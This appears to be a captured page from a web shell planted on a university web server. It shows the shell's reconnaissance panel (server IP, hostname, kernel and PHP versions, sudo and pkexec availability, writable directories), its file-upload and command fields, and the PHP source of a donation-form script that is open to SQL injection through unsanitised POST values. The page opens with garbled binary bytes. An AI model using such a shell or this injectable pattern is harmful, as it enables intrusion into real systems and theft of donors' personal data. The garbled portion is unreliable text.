h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/givebook/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/givebook/pages/givebook_add_db.php
<?ob_start();?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>
<?php
if ($_POST["submit"])
{
	$checkbox_width = 6;
	$checkbox_height = 6;
	$givebook_number = (isset($_POST["givebook_number"])) ? $_POST["givebook_number"] : '';
	$prefix_id = (isset($_POST["prefix_id"])) ? $_POST["prefix_id"] : '';
	$firstname = (isset($_POST["firstname"])) ? $_POST["firstname"] : '';
	$lastname = (isset($_POST["lastname"])) ? $_POST["lastname"] : '';
	$giver_organization = (isset($_POST["giver_organization"])) ? $_POST["giver_organization"] : '';
	$phone = (isset($_POST["phone"])) ? $_POST["phone"] : '';
	$email = (isset($_POST["email"])) ? $_POST["email"] : '';


	if (($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($phone<>"") && ($email<>"") && ($giver_organization<>"")) {
		   //ดูว่ากรอกหนังสือแล้วยัง 
		   $current_title = 1;
		   $title_ok = 0;
		   while ($current_title <= $max_num_titles)
		   {
					$title_name_form_name = "title_name" . $current_title;
					$author_form_name = "author" . $current_title;
					$worktype_id_form_name = "worktype_id" . $current_title;
					$amount_form_name = "amount" . $current_title;	
					$title_name = (isset($_POST[$title_name_form_name])) ? $_POST[$title_name_form_name] : '';
					$author = (isset($_POST[$author_form_name])) ? $_POST[$author_form_name] : '';	
					$worktype_id = (isset($_POST[$worktype_id_form_name])) ? $_POST[$worktype_id_form_name] : '';
					$amount = (isset($_POST[$amount_form_name])) ? $_POST[$amount_form_name] : '';	
					if ( ($title_name <> "") && ($author <> "") && ($worktype_id <> "") & ($amount <> "") ) {
						$title_ok = 1;	
						break;	
					} //if ( ($title_name <> "") && ($author <> "") && ($worktype_id <> "") & ($amount <> "") ) {
					$current_title +=1;		
		   } //while ($current_title <= $max_num_titles)  
		   if ($title_ok == 1) {		  
			//หา givebook_id
			$sql = "SELECT givebook_id FROM givebook_detail ORDER BY givebook_id DESC";
			$query = mysqli_query($conn,$sql);	
			if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
				$new_givebook_id=$result["givebook_id"]+1;		
			} else {  //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
				$new_givebook_id=1;
			} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
			
			//บันทึกลงในตาราง givebook_detail
			$sql = "INSERT INTO givebook_detail ";
			$sql .="(givebook_id,givebook_number,prefix_id,firstname,lastname,giver_organization,phone,email) ";
			$sql .="VALUES ";
			$sql .="(". $new_givebook_id . " ";
			$sql .=",'" . $givebook_number . "' ";
			$sql .="," . $prefix_id . " ";	
			$sql .=",'" . $firstname . "' ";
			$sql .=",'" . $lastname . "' ";
			$sql .=",'" . $giver_organization . "' ";
			$sql .=",'" . $phone . "' ";
			$sql .=",'" . $email . "') ";
			
			$query = mysqli_query($conn,$sql);
			
			if($query)
			{
				//บันทึกลงในตาราง title_detail
				$current_title=1;
				while ($current_title <= $max_num_titles)
				{
					$title_name_form_name = "title_name" . $current_title;
					$author_form_name = "author" . $current_title;
					$worktype_id_form_name = "worktype_id" . $current_title;
					$amount_form_name = "amount" . $current_title;	
					$title_name = (isset($_POST[$title_name_form_name])) ? $_POST[$title_name_form_name] : '';
					$author = (isset($_POST[$author_form_name])) ? $_POST[$author_form_name] : '';	
					$worktype_id = (isset($_POST[$worktype_id_form_name])) ? $_POST[$worktype_id_form_name] : '';
					$amount = (isset($_POST[$amount_form_name])) ? $_POST[$amount_form_name] : '';	
					if ( ($title_name <> "") && ($author <> "") && ($worktype_id <> "") & ($amount <> "") ) {					
						$sql = "INSERT INTO title_detail ";
						$sql .="(givebook_id,title_name,author,worktype_id,amount) ";
						$sql .="VALUES ";
						$sql .="(". $new_givebook_id . " ";
						$sql .=",'". $title_name . "' ";
						$sql .=",'". $author . "' ";
						$sql .=",". $worktype_id . " ";
						$sql .="," . $amount . ") ";
						$query = mysqli_query($conn,$sql);
						if (!$query) {
							echo "ไม่สามารถบันทึกข้อมูลได้";
						} //if (!$query) {		
					
					} //if ( ($title_name <> "") && ($author <> "") && ($worktype_id <> "") & ($amount <> "") ) {
							
					$current_title += 1;		
				} //while ($current_title <= $num_titles)
?>							
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="generatepdf.php?givebook_id=<?php echo $new_givebook_id;?>" target="_blank"><button type="button" class="btn-success">คลิกที่นี่เพื่อพิมพ์หนังสือตอบรับ</button></a>
<?php				
				//echo "บันทึกข้อมูลแล้ว";
				//$redirect_url = "show_agpublish.php?ap_id=" . $new_ap_id;
				//header("location:$redirect_url");
			} else { //if($query)
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}	//if($query)
		 } else { //if ($title_ok == 1) {		
?>
	<BR />กรุณากรอกข้อมูลหนังสือ
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php		 
		 }	//if ($title_ok == 1) {		
				

	} else { //if (($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($phone<>"") && ($email<>"") && ($giver_organization<>"")) {
?>	
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
	</div>		
<?php
	} //if (($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($phone<>"") && ($email<>"") && ($giver_organization<>"")) {
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit